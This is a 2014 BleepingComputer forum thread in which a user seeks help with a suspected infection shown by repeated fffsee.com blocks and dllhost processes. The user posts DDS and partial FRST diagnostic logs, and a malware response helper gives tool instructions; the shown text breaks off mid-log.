Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Getting multiple fffsee.com blocks and multiple dllhost32.dll in task manager


  • Please log in to reply
21 replies to this topic

#1 dazedandconfused21

dazedandconfused21

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:07 PM

Posted 31 October 2014 - 07:21 AM

Hello,

I have a pc that has Malwarebytes and AVG 2015. Malwarebytes continues to popup showing it is blocking fffsee.com several times. and the pc is running very slow. When I check task manager, many instances of dllhost*32 are running. I removed Google Chrome and Java which slowed down the start of the dllhost*32 but I am still killing the processes to work on the pc. I am also noting extra explorer.exe opening in task manager and am killing these when I see them as well. Thank you for your assistance.

 

Here is the DDS.txt:

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17344
Run by Deborah at 7:23:48 on 2014-10-31
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3551.2024 [GMT -4:00]
.
AV: AVG AntiVirus Free Edition 2015 *Enabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: AVG AntiVirus Free Edition 2015 *Enabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
.
============== Running Processes ===============
.
c:\PROGRA~2\AVG\AVG2015\avgrsa.exe
C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe
C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe
C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_service.exe
C:\Program Files (x86)\EaseUS\Todo Backup\bin\GuardAgent.exe
C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe
C:\Program Files (x86)\Intel\AMT\LMS.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe
C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.EXE
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
C:\Program Files (x86)\APC\PowerChute Personal Edition\dataserv.exe
C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_comm_customer.exe
C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_system_customer.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\vds.exe
C:\Windows\System32\WUDFHost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files (x86)\Lenovo\System Update\SUService.exe
C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_user_customer.exe
C:\Windows\system32\Dwm.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.exe
C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe
C:\Windows\System32\StikyNot.exe
C:\Windows\system32\igfxsrvc.exe
C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe
C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe
C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe
C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe
C:\Program Files (x86)\AVG\AVG2015\avgui.exe
C:\Program Files (x86)\AVG Secure Search\vprot.exe
C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
C:\Program Files (x86)\APC\PowerChute Personal Edition\apcsystray.exe
C:\Windows\system32\taskeng.exe
C:\Windows\SysWOW64\ctfmon.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe
C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
C:\Program Files\Lenovo\Lenovo Mouse Suite\FSRremoS.EXE
C:\Program Files\Lenovo\Lenovo Mouse Suite\Pelmiced.exe
C:\Program Files\Lenovo\Lenovo Mouse Suite\PelElvDm.exe
C:\Windows\system32\ctfmon.exe
C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe
C:\Windows\system32\notepad.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Windows\explorer.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\System32\cscript.exe
C:\Windows\syswow64\dllhost.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/webhp?rls=ig
uSearch Bar = Preserve
mWinlogon: Userinit = userinit.exe
BHO: Canon Easy-WebPrint EX BHO: {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll
BHO: AVG Safe Search: {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: {95B7759C-8C7F-4BF1-B163-73684A933233} - <orphaned>
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
EB: Canon Easy-WebPrint EX: {21347690-EC41-4F9A-8887-1F4AEE672439} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
uRun: [RESTART_STICKY_NOTES] C:\Windows\System32\StikyNot.exe
mRun: [Power Manager Power Agenda] C:\PROGRA~2\ThinkPad\UTILIT~1\DPMHost.exe
mRun: [Lenovo Registration] C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe /boot
mRun: [D-Link D-Link DWA-125] C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe
mRun: [WZCSLDR2] C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe
mRun: [Display] C:\Program Files (x86)\APC\PowerChute Personal Edition\DataCollectionLauncher.exe
mRun: [EaseUs Watch] "C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe"
mRun: [EaseUs Tray] "C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe"
mRun: [AVG_UI] "C:\Program Files (x86)\AVG\AVG2015\avgui.exe" /TRAYONLY
mRun: [vProt] "C:\Program Files (x86)\AVG Secure Search\vprot.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [CanonQuickMenu] C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE /logon
mRun: [IJNetworkScannerSelectorEX] C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe /FORCE
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableLUA = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: PromptOnSecureDesktop = dword:0
mPolicies-System: dontdisplaylastusername = dword:1
mPolicies-System: DisableCAD = dword:1
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
TCP: Interfaces\{145F6C64-D76C-4A66-8658-02D842AE2435} : NameServer = 8.8.8.8,8.8.4.4
TCP: Interfaces\{519D74A0-D86D-4949-98FA-74FF6C7DB6FA}\350594E6D24425 : DHCPNameServer = 192.168.168.10
TCP: Interfaces\{519D74A0-D86D-4949-98FA-74FF6C7DB6FA}\7475633345 : DHCPNameServer = 192.168.1.1
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} -
Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
IFEO: ehshell.exe - "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect
x64-BHO: Canon Easy-WebPrint EX BHO: {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexbho.dll
x64-BHO: AVG Safe Search: {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} -
x64-TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexhlp.dll
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [Daemon for Mouse Suite] C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.EXE 60
x64-Run: [LogMeIn GUI] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe"
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} -
x64-Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: GoToAssist Express Customer - C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_winlogonx64.dll
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
x64-IFEO: ehshell.exe - "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect
.
============= SERVICES / DRIVERS ===============
.
R? clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86
R? clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64
R? D_Link_DWA-125;D_Link_DWA-125 Service
R? D_Link_DWA-125_WPS;D_Link_DWA-125_WPS Service
R? dmvsc;dmvsc
R? IEEtwCollectorService;Internet Explorer ETW Collector Service
R? LMIRfsClientNP;LMIRfsClientNP
R? ose64;Office 64 Source Engine
R? RoxMediaDB10;RoxMediaDB10
R? RTL8192su;Realtek RTL8192SU Wireless LAN 802.11n USB 2.0 Network Adapter
R? StorSvc;Storage Service
R? TsUsbFlt;TsUsbFlt
R? TsUsbGD;Remote Desktop Generic USB Device
R? WatAdminSvc;Windows Activation Technologies Service
R? wlcrasvc;Windows Live Mesh remote connections service
R? WSDScan;WSD Scan Support via UMB
S? anodlwf;ANOD Network Security Filter driver
S? APC Data Service;APC Data Service
S? Avgdiska;AVG Disk Driver
S? AVGIDSAgent;AVGIDSAgent
S? AVGIDSDriver;AVGIDSDriver
S? AVGIDSHA;AVGIDSHA
S? Avgldx64;AVG AVI Loader Driver
S? Avgloga;AVG Logging Driver
S? Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield
S? Avgrkx64;AVG Anti-Rootkit Driver
S? Avgtdia;AVG TDI Driver
S? avgtp;avgtp
S? avgwd;AVG WatchDog
S? e1kexpress;Intel® PRO/1000 PCI Express Network Connection Driver K
S? EaseUS Agent;EaseUS Agent
S? EUBAKUP;EUBAKUP
S? EUBKMON;EUBKMON
S? EUDSKACS;EUDSKACS
S? EUFDDISK;EUFDDISK
S? GoToAssist Remote Support Customer;GoToAssist Remote Support Customer
S? Guard Agent;Guard Agent
S? HECIx64;Intel® Management Engine Interface
S? LMIGuardianSvc;LMIGuardianSvc
S? LMIInfo;LogMeIn Kernel Information Provider
S? LMIRfsDriver;LogMeIn Remote File System Driver
S? mbamchameleon;mbamchameleon
S? MBAMProtector;MBAMProtector
S? MBAMScheduler;MBAMScheduler
S? MBAMService;MBAMService
S? MBAMSwissArmy;MBAMSwissArmy
S? MBAMWebAccessControl;MBAMWebAccessControl
S? PelService;Session Launcher Service
S? Power Manager DBC Service;Power Manager DBC Service
S? PxHlpa64;PxHlpa64
S? TVTI2C;Lenovo SM bus driver
S? UNS;Intel® Management and Security Application User Notification Service
S? vToolbarUpdater18.1.9;vToolbarUpdater18.1.9
.
=============== Created Last 30 ================
.
2014-10-31 10:50:58 -------- d-----w- C:\FRST
2014-10-31 10:27:26 -------- d-----w- C:\ProgramData\Oracle
2014-10-31 09:15:58 536576 ----a-w- C:\Windows\SysWow64\sqlite3.dll
2014-10-31 09:12:54 -------- d-----w- C:\AdwCleaner
2014-10-24 16:34:00 -------- d--h--w- C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-10-21 14:54:07 -------- d-----w- C:\Users\Deborah\AppData\Roaming\AVG2015
2014-10-21 14:51:06 -------- d-----w- C:\ProgramData\AVG2015
2014-10-21 14:46:27 -------- d-----w- C:\Users\Deborah\AppData\Local\Avg2015
2014-10-20 17:53:52 0 ----a-w- C:\Windows\System32\qzmktxy.dll
2014-10-15 18:52:58 424448 ----a-w- C:\Windows\System32\aeinv.dll
2014-10-15 18:51:54 77312 ----a-w- C:\Windows\System32\packager.dll
2014-10-15 18:51:54 67072 ----a-w- C:\Windows\SysWow64\packager.dll
.
==================== Find3M  ====================
.
2014-10-31 10:42:24 129752 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-10-10 02:05:59 276480 ----a-w- C:\Windows\System32\generaltel.dll
2014-10-10 02:05:42 507392 ----a-w- C:\Windows\System32\aepdu.dll
2014-10-01 15:11:26 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-10-01 15:11:16 93400 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-10-01 15:11:12 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2014-09-29 00:58:48 3198976 ----a-w- C:\Windows\System32\win32k.sys
2014-09-25 22:32:04 2017280 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2014-09-25 22:31:02 2108416 ----a-w- C:\Windows\System32\inetcpl.cpl
2014-09-25 07:33:57 166984 ----a-w- C:\Windows\System32\g2ax_credential_provider64_758.dll
2014-09-25 02:08:38 371712 ----a-w- C:\Windows\System32\qdvd.dll
2014-09-25 01:40:50 519680 ----a-w- C:\Windows\SysWow64\qdvd.dll
2014-09-19 01:56:02 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2014-09-19 01:55:49 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2014-09-19 01:40:43 66048 ----a-w- C:\Windows\System32\iesetup.dll
2014-09-19 01:40:03 547328 ----a-w- C:\Windows\System32\vbscript.dll
2014-09-19 01:39:58 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2014-09-19 01:38:27 83968 ----a-w- C:\Windows\System32\MshtmlDac.dll
2014-09-19 01:36:57 5829632 ----a-w- C:\Windows\System32\jscript9.dll
2014-09-19 01:26:00 139264 ----a-w- C:\Windows\System32\ieUnatt.exe
2014-09-19 01:25:49 111616 ----a-w- C:\Windows\System32\ieetwcollector.exe
2014-09-19 01:25:12 4201472 ----a-w- C:\Windows\SysWow64\jscript9.dll
2014-09-19 01:25:09 758272 ----a-w- C:\Windows\System32\jscript9diag.dll
2014-09-19 01:18:02 940032 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2014-09-19 01:14:57 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2014-09-19 01:06:47 72704 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2014-09-19 01:02:07 454656 ----a-w- C:\Windows\SysWow64\vbscript.dll
2014-09-19 01:01:47 61952 ----a-w- C:\Windows\SysWow64\iesetup.dll
2014-09-19 01:01:03 51200 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2014-09-19 00:59:40 61952 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2014-09-19 00:50:16 112128 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2014-09-19 00:49:31 597504 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2014-09-19 00:40:12 1249280 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2014-09-19 00:36:23 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2014-09-19 00:33:18 2309632 ----a-w- C:\Windows\System32\wininet.dll
2014-09-19 00:18:55 1068032 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2014-09-18 23:59:11 1810944 ----a-w- C:\Windows\SysWow64\wininet.dll
2014-09-18 02:00:42 3241472 ----a-w- C:\Windows\System32\msi.dll
2014-09-18 01:32:52 2363904 ----a-w- C:\Windows\SysWow64\msi.dll
2014-09-09 22:11:04 2048 ----a-w- C:\Windows\System32\tzres.dll
2014-09-09 21:47:10 2048 ----a-w- C:\Windows\SysWow64\tzres.dll
2014-09-04 05:23:20 424448 ----a-w- C:\Windows\System32\rastls.dll
2014-09-04 05:04:15 372736 ----a-w- C:\Windows\SysWow64\rastls.dll
2014-08-23 02:07:00 404480 ----a-w- C:\Windows\System32\gdi32.dll
2014-08-23 01:45:55 311808 ----a-w- C:\Windows\SysWow64\gdi32.dll
2014-08-21 01:45:10 243480 ----a-w- C:\Windows\System32\drivers\avgldx64.sys
2014-08-19 03:11:28 693176 ----a-w- C:\Windows\System32\winload.efi
2014-08-19 03:10:10 616352 ----a-w- C:\Windows\System32\winresume.efi
2014-08-19 03:08:04 503808 ----a-w- C:\Windows\System32\srcore.dll
2014-08-19 03:08:04 50176 ----a-w- C:\Windows\System32\srclient.dll
2014-08-19 03:08:03 63488 ----a-w- C:\Windows\System32\setbcdlocale.dll
2014-08-19 03:07:51 58880 ----a-w- C:\Windows\System32\appidapi.dll
2014-08-19 03:07:51 32256 ----a-w- C:\Windows\System32\appidsvc.dll
2014-08-19 03:07:33 296960 ----a-w- C:\Windows\System32\rstrui.exe
2014-08-19 03:07:11 17920 ----a-w- C:\Windows\System32\appidcertstorecheck.exe
2014-08-19 03:07:11 146944 ----a-w- C:\Windows\System32\appidpolicyconverter.exe
2014-08-19 02:41:39 43008 ----a-w- C:\Windows\SysWow64\srclient.dll
2014-08-19 02:41:22 50688 ----a-w- C:\Windows\SysWow64\appidapi.dll
2014-08-19 02:06:56 61440 ----a-w- C:\Windows\System32\drivers\appid.sys
2014-08-11 16:49:08 50976 ----a-w- C:\Windows\System32\drivers\avgtpx64.sys
2014-08-07 01:39:52 123672 ----a-w- C:\Windows\System32\drivers\avgmfx64.sys
.
============= FINISH:  7:32:20.95 ===============
 


Edited by xXToffeeXx, 31 October 2014 - 07:32 AM.
Moved to MRL due to DDS log posted~


BC AdBot (Login to Remove)

 


#2 shelf life

shelf life

  • Malware Response Team
  • 2,651 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:@localhost
  • Local time:10:07 PM

Posted 02 November 2014 - 01:17 PM

hi,

 

If you still need help; download a copy of FRST and post its two logs and we will go from there:

 

Please download Farbar Recovery Scan Tool and save it to your Desktop.
 
http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/
 
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system, that will be the right version.

 

Looks like you can get the 64bit version.
 
    Right-click FRST then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
    When the tool opens click Yes to disclaimer.
    Press the Scan button.
    When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
    Please copy and paste the log in your next reply.
 
The first time the tool is run it generates another log (Addition.txt - also located in the same directory the tool was run from). Please also paste that, along with the FRST.txt into your next reply.


How Can I Reduce My Risk to Malware?


#3 dazedandconfused21

dazedandconfused21
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:07 PM

Posted 02 November 2014 - 03:29 PM

Good afternoon,

Below are the two logs requested:

 

FRST.log

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-11-2014
Ran by Deborah (administrator) on ASSISTANT on 02-11-2014 15:13:06
Running from C:\Users\Deborah\Downloads
Loaded Profiles: Deborah & Brenda & Administrator (Available profiles: Deborah & Brenda & Administrator)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_service.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\GuardAgent.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe
(Intel Corporation) C:\Program Files (x86)\Intel\AMT\LMS.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
() C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Intel Corporation) C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\dataserv.exe
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_comm_customer.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_system_customer.exe
(Microsoft Corporation) C:\Windows\System32\vds.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\System Update\SUService.exe
(Lenovo Group Limited) C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_user_customer.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Primax Electronics Ltd.) C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe
(Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(D-Link Corp.) C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe
(Wireless Service) C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
() C:\Program Files (x86)\AVG Secure Search\vprot.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\apcsystray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
() C:\Program Files\Lenovo\Lenovo Mouse Suite\FSRremoS.EXE
(Primax Electronics Ltd.) C:\Program Files\Lenovo\Lenovo Mouse Suite\PELMICED.EXE
() C:\Program Files\Lenovo\Lenovo Mouse Suite\PelElvDm.exe
() C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
